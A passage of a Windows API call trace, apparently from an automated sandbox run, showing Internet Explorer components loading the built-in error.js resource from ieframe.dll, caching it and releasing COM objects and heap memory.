ppvObject=0x9ef166c*=0xd5c160) returned 0x0 [0159.418] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.419] IUnknown:QueryInterface (in: This=0xd5c160, riid=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x9ef16c4 | out: ppvObject=0x9ef16c4*=0xd5c17c) returned 0x0 [0159.419] IUnknown:AddRef (This=0x9ef1630) returned 0x7 [0159.420] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.420] IUnknown:QueryInterface (in: This=0xd5c17c, riid=0x703b6e5c*(Data1=0x7daf9908, Data2=0x8415, Data3=0x4005, Data4=([0]=0x95, [1]=0xae, [2]=0xbd, [3]=0x27, [4]=0xf6, [5]=0xe3, [6]=0xdc, [7]=0x0)), ppvObject=0x1995f4 | out: ppvObject=0x1995f4*=0x0) returned 0x80004002 [0159.420] IUnknown:QueryInterface (in: This=0x9ef1630, riid=0x703b6e5c*(Data1=0x7daf9908, Data2=0x8415, Data3=0x4005, Data4=([0]=0x95, [1]=0xae, [2]=0xbd, [3]=0x27, [4]=0xf6, [5]=0xe3, [6]=0xdc, [7]=0x0)), ppvObject=0x1995f4 | out: ppvObject=0x1995f4*=0x0) returned 0x80004002 [0159.420] IUnknown:QueryInterface (in: This=0xd5c160, riid=0x703b6e5c*(Data1=0x7daf9908, Data2=0x8415, Data3=0x4005, Data4=([0]=0x95, [1]=0xae, [2]=0xbd, [3]=0x27, [4]=0xf6, [5]=0xe3, [6]=0xdc, [7]=0x0)), ppvObject=0x1995f4 | out: ppvObject=0x1995f4*=0x0) returned 0x80004002 [0159.420] IUnknown:AddRef (This=0xd5c17c) returned 0x8 [0159.420] IUnknown:AddRef (This=0x9ef1630) returned 0x8 [0159.420] IUnknown:AddRef (This=0xd5c160) returned 0x0 [0159.420] IUnknown:QueryInterface (in: This=0xd5c160, riid=0x703b6e30*(Data1=0xeb5cda44, Data2=0x5086, Data3=0x44fe, Data4=([0]=0xa9, [1]=0xb1, [2]=0xc6, [3]=0x42, [4]=0x13, [5]=0x53, [6]=0xa5, [7]=0x46)), ppvObject=0x1995a0 | out: ppvObject=0x1995a0*=0x0) returned 0x80004002 [0159.420] IUnknown:QueryInterface (in: This=0xd5c160, riid=0x703b4844*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x1995a0 | out: ppvObject=0x1995a0*=0x0) returned 0x80004002 [0159.420] IInternetProtocolRoot:Start (This=0xd5c17c, szUrl="res://ieframe.dll/error.js", pOIProtSink=0x9ef1628, pOIBindInfo=0x9ef1630, grfPI=0x0, dwReserved=0x0) returned 0x0 [0159.420] IUnknown:AddRef (This=0x9ef1628) returned 0x9 [0159.420] IUnknown:AddRef (This=0x9ef1630) returned 0xa [0159.421] IInternetBindInfo:GetBindInfo (in: This=0x9ef1630, grfBINDF=0xd5c198, pbindinfo=0xd5c1a0 | out: grfBINDF=0xd5c198*=0x1000c3, pbindinfo=0xd5c1a0) returned 0x0 [0159.421] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3a) returned 0x6db3a0 [0159.421] CreateUri (in: pwzURI="res://ieframe.dll/error.js", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x19724c | out: ppURI=0x19724c*=0x9ee0cc4) returned 0x0 [0159.421] IUri:GetHost (in: This=0x9ee0cc4, pbstrHost=0x197250 | out: pbstrHost=0x197250*="ieframe.dll") returned 0x0 [0159.421] CoInternetParseUrl (in: pwzUrl="ieframe.dll", ParseAction=0x13, dwFlags=0x0, pszResult=0x197258, cchResult=0x1000, pcchResult=0x197240, dwReserved=0x0 | out: pszResult="ieframe.dll", pcchResult=0x197240) returned 0x0 [0159.421] SysReAllocString (in: pbstr=0x197250*="ieframe.dll", psz="ieframe.dll" | out: pbstr=0x197250*="ieframe.dll") returned 1 [0159.421] IUri:GetPath (in: This=0x9ee0cc4, pbstrPath=0x197254 | out: pbstrPath=0x197254*="/error.js") returned 0x0 [0159.421] CoInternetParseUrl (in: pwzUrl="/error.js", ParseAction=0x13, dwFlags=0x0, pszResult=0x197258, cchResult=0x1000, pcchResult=0x197240, dwReserved=0x0 | out: pszResult="/error.js", pcchResult=0x197240) returned 0x0 [0159.421] SysReAllocString (in: pbstr=0x197254*="/error.js", psz="/error.js" | out: pbstr=0x197254*="/error.js") returned 1 [0159.421] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x9ef3b38 [0159.422] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x6b63c8 [0159.422] IsCharSpaceW (wch=0x65) returned 0 [0159.422] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x9ef0f90 [0159.422] IUnknown:Release (This=0x9ee0cc4) returned 0x3 [0159.422] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x60) returned 0x6ed00000 [0159.423] PathFindFileNameW (pszPath="ieframe.dll") returned="ieframe.dll" [0159.423] StrCmpICW (pszStr1="ieframe.dll", pszStr2="shdoclc.dll") returned -10 [0159.423] StrCmpICW (pszStr1="ieframe.dll", pszStr2="shdoclc") returned -10 [0159.423] FindResourceExW (hModule=0x6ed00000, lpType=0x17, lpName="error.js", wLanguage=0x0) returned 0x6f2998d0 [0159.423] LoadResource (hModule=0x6ed00000, hResInfo=0x6f2998d0) returned 0x6f565f18 [0159.423] LockResource (hResData=0x6f565f18) returned 0x6f565f18 [0159.423] VirtualQuery (in: lpAddress=0x6f565f18, lpBuffer=0x19923c, dwLength=0x1c | out: lpBuffer=0x19923c*(BaseAddress=0x6f565000, AllocationBase=0x6ed00000, AllocationProtect=0x80, RegionSize=0x334000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0159.423] SizeofResource (hModule=0x6ed00000, hResInfo=0x6f2998d0) returned 0x6aa [0159.424] CreateAsyncBindCtxEx (in: pbc=0x0, dwOptions=0x0, pBSCb=0x0, pEnum=0x0, ppBC=0x1992b0*=0x0, reserved=0x0 | out: ppBC=0x1992b0*=0x6d8398) returned 0x0 [0159.424] CreateUri (in: pwzURI="res://ieframe.dll/error.js", dwFlags=0x3002b84, dwReserved=0x0, ppURI=0x199280 | out: ppURI=0x199280*=0x9ee0cc4) returned 0x0 [0159.424] IUri:GetProperties (in: This=0x9ee0cc4, pdwFlags=0x199298 | out: pdwFlags=0x199298*=0x29b57) returned 0x0 [0159.424] IUnknown:QueryInterface (in: This=0x9ee0cc4, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19925c | out: ppvObject=0x19925c*=0x9ee0cc4) returned 0x0 [0159.424] IUnknown:Release (This=0x9ee0cc4) returned 0x4 [0159.424] IUnknown:AddRef (This=0x9ee0cc4) returned 0x5 [0159.424] IUri:GetScheme (in: This=0x9ee0cc4, pdwScheme=0x199224 | out: pdwScheme=0x199224*=0x12) returned 0x0 [0159.424] IUnknown:QueryInterface (in: This=0x9ee0cc4, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1991e4 | out: ppvObject=0x1991e4*=0x9ee0cc4) returned 0x0 [0159.425] IUnknown:Release (This=0x9ee0cc4) returned 0x5 [0159.425] IUnknown:AddRef (This=0x9ee0cc4) returned 0x6 [0159.425] StrCmpICW (pszStr1="ieframe.dll", pszStr2="ieframe.dll") returned 0 [0159.425] IUnknown:Release (This=0x9ee0cc4) returned 0x5 [0159.425] IUnknown:QueryInterface (in: This=0x9ee0cc4, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19925c | out: ppvObject=0x19925c*=0x9ee0cc4) returned 0x0 [0159.425] IUnknown:Release (This=0x9ee0cc4) returned 0x5 [0159.425] IUnknown:AddRef (This=0x9ee0cc4) returned 0x6 [0159.426] FindMimeFromData (in: pBC=0x6d8398, pwzUrl="/error.js", pBuffer=0x0, cbSize=0x0, pwzMimeProposed=0x0, dwMimeFlags=0x0, ppwzMimeOut=0x1992b4, dwReserved=0x0 | out: ppwzMimeOut=0x1992b4*=0x0) returned 0x80070002 [0159.426] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.427] memcpy_s (in: _Destination=0xd5e100, _DestinationSize=0x100, _Source=0x6f565f18, _SourceSize=0x100 | out: _Destination=0xd5e100) returned 0x0 [0159.428] FindMimeFromData (in: pBC=0x6d8398, pwzUrl="/error.js", pBuffer=0xd5e100, cbSize=0x100, pwzMimeProposed="text/html", dwMimeFlags=0x0, ppwzMimeOut=0x1992b4, dwReserved=0x0 | out: ppwzMimeOut=0x1992b4*="text/html") returned 0x0 [0159.428] IUnknown:Release (This=0x9ee0cc4) returned 0x5 [0159.429] IInternetProtocolSink:ReportProgress (This=0x9ef1628, ulStatusCode=0x16, szStatusText="text/html") returned 0x0 [0159.429] IBindStatusCallback:OnProgress (This=0xd44510, ulProgress=0x0, ulProgressMax=0x0, ulStatusCode=0xd, szStatusText="text/html") returned 0x0 [0159.429] IBindCtx:GetObjectParam (in: This=0x6c8898, pszKey="__DWNBINDINFO", ppunk=0x199108 | out: ppunk=0x199108*=0x0) returned 0x80004005 [0159.429] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x9ef1130 [0159.429] StrChrW (lpStart="text/html", wMatch=0x3b) returned 0x0 [0159.429] StrCmpNICW (lpStr1="text/", lpStr2="text/", nChar=5) returned 0 [0159.429] IUnknown:Release (This=0x9ee0cc4) returned 0x4 [0159.429] IUnknown:Release (This=0x9ee0cc4) returned 0x3 [0159.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="res://ieframe.dll/error.js", cchWideChar=-1, lpMultiByteStr=0x198e28, cbMultiByte=519, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="res://ieframe.dll/error.js", lpUsedDefaultChar=0x0) returned 27 [0159.429] CreateUrlCacheEntryA (in: lpszUrlName="res://ieframe.dll/error.js", dwExpectedFileSize=0x6aa, lpszFileExtension=0x0, lpszFileName="", dwReserved=0x0 | out: lpszFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\0GQKFXIA\\error[1]") returned 1 [0159.431] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\0GQKFXIA\\error[1]") returned 84 [0159.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x199040, cbMultiByte=85, lpWideCharStr=0x199310, cchWideChar=260 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\0GQKFXIA\\error[1]") returned 85 [0159.431] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\0GQKFXIA\\error[1]" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\ie\\0gqkfxia\\error[1]"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64c [0159.431] WriteFile (in: hFile=0x64c, lpBuffer=0x6f565f18*, nNumberOfBytesToWrite=0x6aa, lpNumberOfBytesWritten=0x1992a4, lpOverlapped=0x0 | out: lpBuffer=0x6f565f18*, lpNumberOfBytesWritten=0x1992a4*=0x6aa, lpOverlapped=0x0) returned 1 [0159.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="res://ieframe.dll/error.js", cchWideChar=-1, lpMultiByteStr=0x198bfc, cbMultiByte=519, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="res://ieframe.dll/error.js", lpUsedDefaultChar=0x0) returned 27 [0159.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\0GQKFXIA\\error[1]", cchWideChar=-1, lpMultiByteStr=0x19902c, cbMultiByte=519, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\0GQKFXIA\\error[1]", lpUsedDefaultChar=0x0) returned 85 [0159.438] CommitUrlCacheEntryA (lpszUrlName="res://ieframe.dll/error.js", lpszLocalFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\0GQKFXIA\\error[1]", ExpireTime=0x0, LastModifiedTime=0x0, CacheEntryType=0x0, lpHeaderInfo=0x0, dwHeaderSize=0x1, lpszFileExtension=0x0, lpszOriginalUrl=0x0) returned 1 [0159.439] IInternetProtocolSink:ReportProgress (This=0x9ef1628, ulStatusCode=0xe, szStatusText="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\0GQKFXIA\\error[1]") returned 0x0 [0159.455] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.455] GetProcessHeap () returned 0x5e0000 [0159.455] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6aa) returned 0x9ef3f00 [0159.455] memcpy_s (in: _Destination=0x9ef3f00, _DestinationSize=0x6aa, _Source=0x6f565f18, _SourceSize=0x6aa | out: _Destination=0x9ef3f00) returned 0x0 [0159.456] IInternetProtocolSink:ReportData (This=0x9ef1628, grfBSCF=0xd, ulProgress=0x6aa, ulProgressMax=0x6aa) returned 0x0 [0159.456] IInternetProtocol:Read (in: This=0xd5c17c, pv=0x6db7a8, cb=0x2000, pcbRead=0x199130 | out: pv=0x6db7a8, pcbRead=0x199130*=0x6aa) returned 0x0 [0159.456] IBindStatusCallback:OnProgress (This=0xd44510, ulProgress=0x6aa, ulProgressMax=0x6aa, ulStatusCode=0x4, szStatusText="res://ieframe.dll/error.js") returned 0x0 [0159.456] QueryPerformanceCounter (in: lpPerformanceCount=0x1990c8 | out: lpPerformanceCount=0x1990c8*=3097827506081) returned 1 [0159.456] IBindStatusCallback:OnProgress (This=0xd44510, ulProgress=0x6aa, ulProgressMax=0x6aa, ulStatusCode=0xe, szStatusText="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\0GQKFXIA\\error[1]") returned 0x0 [0159.456] GetCurrentProcessId () returned 0xe14 [0159.457] IBindCtx:GetObjectParam (in: This=0x6c8898, pszKey="__DWNBINDINFO", ppunk=0x1990c8 | out: ppunk=0x1990c8*=0x0) returned 0x80004005 [0159.457] IBindStatusCallback:OnProgress (This=0xd44510, ulProgress=0x6aa, ulProgressMax=0x6aa, ulStatusCode=0x6, szStatusText="res://ieframe.dll/error.js") returned 0x0 [0159.457] QueryPerformanceCounter (in: lpPerformanceCount=0x1990c0 | out: lpPerformanceCount=0x1990c0*=3097827579730) returned 1 [0159.457] QueryPerformanceCounter (in: lpPerformanceCount=0x1990c8 | out: lpPerformanceCount=0x1990c8*=3097827596204) returned 1 [0159.457] IInternetProtocol:LockRequest (This=0xd5c17c, dwOptions=0x0) returned 0x0 [0159.457] IBindStatusCallback:RemoteOnDataAvailable (This=0xd44510, grfBSCF=0x5, dwSize=0x6aa, pFormatetc=0x9ef2a68, pStgmed=0x6d9390) returned 0x0 [0159.457] IUnknown:AddRef (This=0x9ef3890) returned 0x3 [0159.457] IUnknown:QueryInterface (in: This=0x6cb500, riid=0x6d6fe90c*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1974b0 | out: ppvObject=0x1974b0*=0x0) returned 0x80004002 [0159.457] IUnknown:QueryInterface (in: This=0xd5c160, riid=0x6d6fe90c*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x197484 | out: ppvObject=0x197484*=0x0) returned 0x80004002 [0159.458] IUnknown:QueryInterface (in: This=0x6cb500, riid=0x6d6fe934*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1974c0 | out: ppvObject=0x1974c0*=0x0) returned 0x80004002 [0159.458] IUnknown:QueryInterface (in: This=0xd5c160, riid=0x6d6fe934*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x197484 | out: ppvObject=0x197484*=0x0) returned 0x80004002 [0159.458] IUnknown:AddRef (This=0x68dcbc) returned 0xa [0159.458] IUri:GetScheme (in: This=0x68dcbc, pdwScheme=0x1990a8 | out: pdwScheme=0x1990a8*=0x12) returned 0x0 [0159.458] IUnknown:Release (This=0x68dcbc) returned 0x9 [0159.458] IBindStatusCallback:OnStopBinding (This=0xd44510, hresult=0x0, szError=0x0) returned 0x0 [0159.458] IBinding:RemoteGetBindResult (in: This=0x6cb500, pclsidProtocol=0x1990fc, pdwResult=0x1990ec, pszResult=0x1990f4, dwReserved=0x0 | out: pclsidProtocol=0x1990fc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), pdwResult=0x1990ec*=0x0, pszResult=0x1990f4*=0x0) returned 0x0 [0159.458] IUri:GetScheme (in: This=0x68dcbc, pdwScheme=0x1990dc | out: pdwScheme=0x1990dc*=0x12) returned 0x0 [0159.458] IUri:GetSchemeName (in: This=0x68dcbc, pbstrSchemeName=0x1990e0 | out: pbstrSchemeName=0x1990e0*="res") returned 0x0 [0159.458] _wcsnicmp (_String1="res", _String2="mhtml", _MaxCount=0x5) returned 5 [0159.459] CoTaskMemFree (pv=0x0) [0159.459] IInternetProtocolSink:ReportResult (This=0x9ef1628, hrResult=0x0, dwError=0x0, szResult=0x0) returned 0x0 [0159.459] IInternetProtocolRoot:Terminate (This=0xd5c17c, dwOptions=0x0) returned 0x0 [0159.459] IUnknown:Release (This=0x9ef1630) returned 0x9 [0159.459] IUnknown:Release (This=0x9ef1628) returned 0x8 [0159.459] ReleaseBindInfo (pbindinfo=0xd5c1a0) [0159.459] FreeLibrary (hLibModule=0x6ed00000) returned 1 [0159.459] CloseHandle (hObject=0x64c) returned 1 [0159.460] IUnknown:Release (This=0x6d8398) returned 0x0 [0159.460] CoTaskMemFree (pv=0x9ef1230) [0159.461] IUnknown:Release (This=0xd5c17c) returned 0x6 [0159.461] IUnknown:Release (This=0x9ef1630) returned 0x6 [0159.461] IUnknown:Release (This=0xd5c160) returned 0x1 [0159.461] IUnknown:Release (This=0x9ef3890) returned 0x2 [0159.461] IUnknown:Release (This=0x6c8898) returned 0x2 [0159.461] IUnknown:Release (This=0x6c8858) returned 0x0 [0159.461] IUnknown:Release (This=0x68dcbc) returned 0x8 [0159.461] IUnknown:Release (This=0x6cdc88) returned 0x0 [0159.461] IUnknown:Release (This=0x6d8c2c) returned 0x1 [0159.461] IUnknown:Release (This=0x6d8c30) returned 0x0 [0159.461] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8c28 | out: hHeap=0x5e0000) returned 1 [0159.461] IUnknown:Release (This=0x68dcbc) returned 0x7 [0159.462] IUnknown:Release (This=0x68dcbc) returned 0x6 [0159.462] CoTaskMemFree (pv=0x0) [0159.462] GetCurrentProcessId () returned 0xe14 [0159.462] GetCurrentThreadId () returned 0xb48 [0159.462] memcpy_s (in: _Destination=0x199ecc, _DestinationSize=0xc, _Source=0xd445e0, _SourceSize=0xc | out: _Destination=0x199ecc) returned 0x0 [0159.462] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.462] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x200c) returned 0x9ef45b8 [0159.463] IUnknown:AddRef (This=0x9ef3890) returned 0x3 [0159.463] IInternetProtocol:Read (in: This=0xd5c17c, pv=0x9ef4c6e, cb=0x1956, pcbRead=0x19957c | out: pv=0x9ef4c6e, pcbRead=0x19957c*=0x0) returned 0x1 [0159.463] IUnknown:Release (This=0x9ef3890) returned 0x2 [0159.463] IUnknown:AddRef (This=0x9ef3890) returned 0x3 [0159.463] IInternetProtocol:Read (in: This=0xd5c17c, pv=0x9ef4c6e, cb=0x1956, pcbRead=0x19957c | out: pv=0x9ef4c6e, pcbRead=0x19957c*=0x0) returned 0x1 [0159.463] IUnknown:Release (This=0x9ef3890) returned 0x2 [0159.464] IUnknown:Release (This=0x9ef3890) returned 0x1 [0159.464] GetCurrentThreadId () returned 0xb48 [0159.464] IUnknown:AddRef (This=0x6cb500) returned 0x2 [0159.464] IUnknown:Release (This=0x6cb500) returned 0x1 [0159.465] RevokeBindStatusCallback (pBC=0x6c8898, pBSCb=0xd44510) returned 0x0 [0159.465] IUnknown:Release (This=0xd44518) returned 0x3 [0159.465] IUnknown:Release (This=0xd44510) returned 0x2 [0159.465] IUnknown:AddRef (This=0x6c8898) returned 0x3 [0159.465] IUnknown:Release (This=0x6c8898) returned 0x2 [0159.465] IUnknown:Release (This=0x6c8898) returned 0x1 [0159.465] IUnknown:Release (This=0x6cb500) returned 0x0 [0159.465] IUnknown:Release (This=0xd0eb20) returned 0x0 [0159.465] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6c8918 | out: hHeap=0x5e0000) returned 1 [0159.465] IInternetProtocol:UnlockRequest (This=0xd5c17c) returned 0x0 [0159.465] IUnknown:Release (This=0xd5c17c) returned 0x1 [0159.466] IUnknown:Release (This=0x9ef1630) returned 0x1 [0159.466] IUnknown:Release (This=0xd5c160) returned 0x0 [0159.466] GetProcessHeap () returned 0x5e0000 [0159.466] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3f00 | out: hHeap=0x5e0000) returned 1 [0159.466] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef0f90 | out: hHeap=0x5e0000) returned 1 [0159.466] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b63c8 | out: hHeap=0x5e0000) returned 1 [0159.466] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3b38 | out: hHeap=0x5e0000) returned 1 [0159.466] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db3a0 | out: hHeap=0x5e0000) returned 1 [0159.467] GetCurrentThreadId () returned 0xb48 [0159.468] QueryPerformanceCounter (in: lpPerformanceCount=0x199ef0 | out: lpPerformanceCount=0x199ef0*=3097828685721) returned 1 [0159.468] IUnknown:Release (This=0x68dcbc) returned 0x5 [0159.468] IUnknown:Release (This=0x68dcbc) returned 0x4 [0159.468] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef1130 | out: hHeap=0x5e0000) returned 1 [0159.469] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5be0 | out: hHeap=0x5e0000) returned 1 [0159.469] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db430 | out: hHeap=0x5e0000) returned 1 [0159.469] IUnknown:Release (This=0x68dcbc) returned 0x3 [0159.469] IUnknown:Release (This=0x68eabc) returned 0x3 [0159.469] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3a) returned 0x6db310 [0159.469] IUnknown:AddRef (This=0x68dcbc) returned 0x4 [0159.469] IUri:GetAbsoluteUri (in: This=0x68dcbc, pbstrAbsoluteUri=0x19a008 | out: pbstrAbsoluteUri=0x19a008*="res://ieframe.dll/error.js") returned 0x0 [0159.469] IUri:GetSchemeName (in: This=0x68dcbc, pbstrSchemeName=0x199fcc | out: pbstrSchemeName=0x199fcc*="res") returned 0x0 [0159.469] _wcsnicmp (_String1="res", _String2="data", _MaxCount=0x5) returned 14 [0159.470] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0159.470] IInternetSecurityManagerEx2:MapUrlToZoneEx2 (in: This=0x6cdf88, pUri=0x68dcbc, pdwZone=0x19a01c, dwFlags=0x0, ppwszMappedUrl=0x0, pdwOutFlags=0x0 | out: pdwZone=0x19a01c*=0x0, ppwszMappedUrl=0x0, pdwOutFlags=0x0) returned 0x0 [0159.470] IInternetSecurityManager:MapUrlToZone (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.js", pdwZone=0x19a01c, dwFlags=0x0 | out: pdwZone=0x19a01c*=0xffffffff) returned 0x800c0011 [0159.470] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.470] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x199278 | out: ppvObject=0x199278*=0x6e784f9c) returned 0x0 [0159.471] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.471] IInternetProtocolInfo:ParseUrl (in: This=0x6e784f9c, pwzUrl="res://ieframe.dll/error.js", ParseAction=3, dwParseFlags=0x0, pwzResult=0x6c8b18, cchResult=0x1b, pcchResult=0x199288, dwReserved=0x0 | out: pwzResult="", pcchResult=0x199288*=0x27) returned 0x1 [0159.471] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.471] CreateUri (in: pwzURI="res://ieframe.dll/error.js", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x1951f4 | out: ppURI=0x1951f4*=0x9ee0cc4) returned 0x0 [0159.471] IUri:GetHost (in: This=0x9ee0cc4, pbstrHost=0x1951f8 | out: pbstrHost=0x1951f8*="ieframe.dll") returned 0x0 [0159.471] CoInternetParseUrl (in: pwzUrl="ieframe.dll", ParseAction=0x13, dwFlags=0x0, pszResult=0x195200, cchResult=0x1000, pcchResult=0x1951e8, dwReserved=0x0 | out: pszResult="ieframe.dll", pcchResult=0x1951e8) returned 0x0 [0159.471] SysReAllocString (in: pbstr=0x1951f8*="ieframe.dll", psz="ieframe.dll" | out: pbstr=0x1951f8*="ieframe.dll") returned 1 [0159.471] IUri:GetPath (in: This=0x9ee0cc4, pbstrPath=0x1951fc | out: pbstrPath=0x1951fc*="/error.js") returned 0x0 [0159.471] CoInternetParseUrl (in: pwzUrl="/error.js", ParseAction=0x13, dwFlags=0x0, pszResult=0x195200, cchResult=0x1000, pcchResult=0x1951e8, dwReserved=0x0 | out: pszResult="/error.js", pcchResult=0x1951e8) returned 0x0 [0159.471] SysReAllocString (in: pbstr=0x1951fc*="/error.js", psz="/error.js" | out: pbstr=0x1951fc*="/error.js") returned 1 [0159.471] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x9ef3a20 [0159.471] IUnknown:Release (This=0x9ee0cc4) returned 0x3 [0159.472] SearchPathW (in: lpPath=0x0, lpFileName="ieframe.dll", lpExtension=0x0, nBufferLength=0x1000, lpBuffer=0x197234, lpFilePart=0x19722c | out: lpBuffer="C:\\Windows\\SysWOW64\\ieframe.dll", lpFilePart=0x19722c*="ieframe.dll") returned 0x1f [0159.472] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3a20 | out: hHeap=0x5e0000) returned 1 [0159.472] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0159.472] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.472] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x199234 | out: ppvObject=0x199234*=0x6e784f9c) returned 0x0 [0159.472] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.472] IInternetProtocolInfo:ParseUrl (in: This=0x6e784f9c, pwzUrl="res://ieframe.dll/error.js", ParseAction=3, dwParseFlags=0x0, pwzResult=0x68d758, cchResult=0x27, pcchResult=0x199288, dwReserved=0x0 | out: pwzResult="file://C:\\Windows\\SysWOW64\\ieframe.dll", pcchResult=0x199288*=0x27) returned 0x0 [0159.472] 